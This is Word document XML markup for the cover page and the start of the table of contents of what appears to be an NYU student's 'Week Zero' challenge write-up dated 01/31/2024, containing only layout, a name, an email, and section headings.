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713F" w14:textId="50BDE50E" w:rsidR="00D21F47" w:rsidRDefault="00D21F47">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251657215" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="17CE82BB" wp14:editId="28A8187C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>5095875</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-923924</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2667000" cy="10325100"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="3" name="Rectangle 3"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2667000" cy="10325100"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>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E1F79" id="Rectangle 3" o:spid="_x0000_s1026" style="position:absolute;margin-left:401.25pt;margin-top:-72.75pt;width:210pt;height:813pt;z-index:2516572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" fillcolor="black [3213]" stroked="f">
                <w10:wrap anchorx="page"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="22326629" w14:textId="7A2DF932" w:rsidR="000E2AB3" w:rsidRPr="005264D0" w:rsidRDefault="00D21F47">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="400069" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251668480" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6BF08E77" wp14:editId="3FB2A5D8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>4591050</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3510563" cy="2629535"/>
            <wp:effectExtent l="19050" t="19050" r="13970" b="18415"/>
            <wp:wrapNone/>
            <wp:docPr id="991481674" name="Picture 1" descr="New York University - Chermayeff &amp; Geismar &amp; Hav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York University - Chermayeff &amp; Geismar &amp; Havi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0563" cy="2629535"/>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3E8D25C7" wp14:editId="549B4CD7">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>19050</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>7248525</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3498215" cy="562966"/>
            <wp:effectExtent l="38100" t="38100" r="45085" b="46990"/>
            <wp:wrapNone/>
            <wp:docPr id="917180561" name="Picture 2" descr="Identity Style Guide | NYU Tandon School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ntity Style Guide | NYU Tandon School of Engineeri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5729" r="-2128" b="2659"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3546204" cy="570689"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>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20E2" w:rsidRPr="00B920E2">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251666432" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6ECCFC6D" wp14:editId="51C058D7">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>4352925</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="margin">
                  <wp:posOffset>8162925</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2360930" cy="67627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6275"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="9525">
                          <a:noFill/>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="3CB5A8B1" w14:textId="45368094" w:rsidR="00B920E2" w:rsidRPr="00D21F47" w:rsidRDefault="00D21F47" w:rsidP="00B920E2">
                            <w:pPr>
                              <w:rPr>
                                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                                <w:b/>
                                <w:bCs/>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                <w:sz w:val="28"/>
                                <w:szCs w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00D21F47">
                              <w:rPr>
                                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                                <w:b/>
                                <w:bCs/>
                                <w:color w:val="56018D"/>
                                <w:sz w:val="36"/>
                                <w:szCs w:val="36"/>
                              </w:rPr>
                              <w:t>Lindsay Von Tish</w:t>
                            </w:r>
                            <w:r w:rsidR="00B920E2" w:rsidRPr="00B920E2">
                              <w:rPr>
                                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                                <w:b/>
                                <w:bCs/>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                <w:sz w:val="28"/>
                                <w:szCs w:val="28"/>
                              </w:rPr>
                              <w:br/>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                                <w:b/>
                                <w:bCs/>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                <w:sz w:val="28"/>
                                <w:szCs w:val="28"/>
                              </w:rPr>
                              <w:t>lmv9443@nyu.edu</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ECCFC6D" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
                <v:stroke joinstyle="miter"/>
                <v:path gradientshapeok="t" o:connecttype="rect"/>
              </v:shapetype>
              <v:shape id="Text Box 2" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;margin-left:342.75pt;margin-top:642.75pt;width:185.9pt;height:53.25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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="3CB5A8B1" w14:textId="45368094" w:rsidR="00B920E2" w:rsidRPr="00D21F47" w:rsidRDefault="00D21F47" w:rsidP="00B920E2">
                      <w:pPr>
                        <w:rPr>
                          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                          <w:b/>
                          <w:bCs/>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                          <w:sz w:val="28"/>
                          <w:szCs w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00D21F47">
                        <w:rPr>
                          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                          <w:b/>
                          <w:bCs/>
                          <w:color w:val="56018D"/>
                          <w:sz w:val="36"/>
                          <w:szCs w:val="36"/>
                        </w:rPr>
                        <w:t>Lindsay Von Tish</w:t>
                      </w:r>
                      <w:r w:rsidR="00B920E2" w:rsidRPr="00B920E2">
                        <w:rPr>
                          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                          <w:b/>
                          <w:bCs/>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                          <w:sz w:val="28"/>
                          <w:szCs w:val="28"/>
                        </w:rPr>
                        <w:br/>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                          <w:b/>
                          <w:bCs/>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                          <w:sz w:val="28"/>
                          <w:szCs w:val="28"/>
                        </w:rPr>
                        <w:t>lmv9443@nyu.edu</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square" anchorx="margin" anchory="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="0032484C" w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1C32505F" wp14:editId="3C61B88B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-752475</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1133475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7410450" cy="1619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0" cy="1619250"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="9525">
                          <a:noFill/>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="2F6FE3B5" w14:textId="49422370" w:rsidR="0032484C" w:rsidRPr="00D21F47" w:rsidRDefault="00D21F47" w:rsidP="0032484C">
                            <w:pPr>
                              <w:spacing w:after="0"/>
                              <w:jc w:val="right"/>
                              <w:rPr>
                                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                                <w:b/>
                                <w:bCs/>
                                <w:color w:val="56018D"/>
                                <w:sz w:val="96"/>
                                <w:szCs w:val="96"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00D21F47">
                              <w:rPr>
                                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                                <w:b/>
                                <w:bCs/>
                                <w:color w:val="56018D"/>
                                <w:sz w:val="96"/>
                                <w:szCs w:val="96"/>
                              </w:rPr>
                              <w:t>Challenge Write Up</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="44860EA3" w14:textId="3D00F3AC" w:rsidR="0032484C" w:rsidRPr="0032484C" w:rsidRDefault="00D21F47" w:rsidP="0032484C">
                            <w:pPr>
                              <w:spacing w:after="0"/>
                              <w:jc w:val="right"/>
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                <w:sz w:val="40"/>
                                <w:szCs w:val="40"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                <w:sz w:val="40"/>
                                <w:szCs w:val="40"/>
                              </w:rPr>
                              <w:t>Week Zero</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2E49EF6F" w14:textId="689A6397" w:rsidR="0032484C" w:rsidRPr="0032484C" w:rsidRDefault="00D21F47" w:rsidP="0032484C">
                            <w:pPr>
                              <w:spacing w:after="0"/>
                              <w:jc w:val="right"/>
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                <w:sz w:val="40"/>
                                <w:szCs w:val="40"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                <w:sz w:val="40"/>
                                <w:szCs w:val="40"/>
                              </w:rPr>
                              <w:t>01/31/2024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2505F" id="_x0000_s1027" type="#_x0000_t202" style="position:absolute;margin-left:-59.25pt;margin-top:89.25pt;width:583.5pt;height:12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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="2F6FE3B5" w14:textId="49422370" w:rsidR="0032484C" w:rsidRPr="00D21F47" w:rsidRDefault="00D21F47" w:rsidP="0032484C">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                        <w:jc w:val="right"/>
                        <w:rPr>
                          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                          <w:b/>
                          <w:bCs/>
                          <w:color w:val="56018D"/>
                          <w:sz w:val="96"/>
                          <w:szCs w:val="96"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00D21F47">
                        <w:rPr>
                          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                          <w:b/>
                          <w:bCs/>
                          <w:color w:val="56018D"/>
                          <w:sz w:val="96"/>
                          <w:szCs w:val="96"/>
                        </w:rPr>
                        <w:t>Challenge Write Up</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="44860EA3" w14:textId="3D00F3AC" w:rsidR="0032484C" w:rsidRPr="0032484C" w:rsidRDefault="00D21F47" w:rsidP="0032484C">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                        <w:jc w:val="right"/>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                          <w:sz w:val="40"/>
                          <w:szCs w:val="40"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                          <w:sz w:val="40"/>
                          <w:szCs w:val="40"/>
                        </w:rPr>
                        <w:t>Week Zero</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2E49EF6F" w14:textId="689A6397" w:rsidR="0032484C" w:rsidRPr="0032484C" w:rsidRDefault="00D21F47" w:rsidP="0032484C">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                        <w:jc w:val="right"/>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                          <w:sz w:val="40"/>
                          <w:szCs w:val="40"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                          <w:sz w:val="40"/>
                          <w:szCs w:val="40"/>
                        </w:rPr>
                        <w:t>01/31/2024</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="0032484C" w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1BE31E35" wp14:editId="1746EC83">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-904875</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>971550</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7753350" cy="2000250"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="2" name="Rectangle 2"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="7753350" cy="2000250"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>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F67036" id="Rectangle 2" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.25pt;margin-top:76.5pt;width:610.5pt;height:1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" fillcolor="black [3213]" stroked="f"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="000E2AB3" w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:id w:val="-1132630467"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="680CB08C" w14:textId="250F7D1A" w:rsidR="0061682E" w:rsidRPr="005264D0" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="005264D0">
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            </w:rPr>
            <w:t>Table of Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="322683FB" w14:textId="6EF0DBB8" w:rsidR="00A44D04" w:rsidRPr="005264D0" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="005264D0">
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="005264D0">
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="005264D0">
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc129370235" w:history="1">
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Executive Summary</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_Toc129370235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3</w:t>
            </w:r>
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0AA1FCF1" w14:textId="29273983" w:rsidR="00A44D04" w:rsidRPr="005264D0" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc129370236" w:history="1">
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Introduction</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_Toc129370236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4</w:t>
            </w:r>
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="03716B58" w14:textId="112CDEBE" w:rsidR="00A44D04" w:rsidRPr="005264D0" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc129370237" w:history="1">
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Goals and Objectives</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_Toc129370237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3</w:t>
            </w:r>
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="312FAE84" w14:textId="568BE9D7" w:rsidR="00A44D04" w:rsidRPr="005264D0" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc129370238" w:history="1">
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Scope Overview</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_Toc129370238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3</w:t>
            </w:r>
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0D46C37D" w14:textId="41B8B642" w:rsidR="00A44D04" w:rsidRPr="005264D0" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc129370239" w:history="1">
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
              </w:rPr>
              <w:t>In Scope</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_Toc129370239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3</w:t>
            </w:r>
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6EC65B76" w14:textId="11DC7564" w:rsidR="00A44D04" w:rsidRPr="005264D0" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc129370240" w:history="1">
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Out of Scope</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_Toc129370240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3</w:t>
            </w:r>
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4AAFC1E4" w14:textId="23038824" w:rsidR="00A44D04" w:rsidRPr="005264D0" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc129370241" w:history="1">
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Methods and Scope</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_Toc129370241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4</w:t>
            </w:r>
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="53AE23C4" w14:textId="3352A3A9" w:rsidR="00A44D04" w:rsidRPr="005264D0" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc129370242" w:history="1">
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Detailed Scope</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_Toc129370242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4</w:t>
            </w:r>
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5A9EEB2C" w14:textId="0E23003D" w:rsidR="00A44D04" w:rsidRPr="005264D0" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
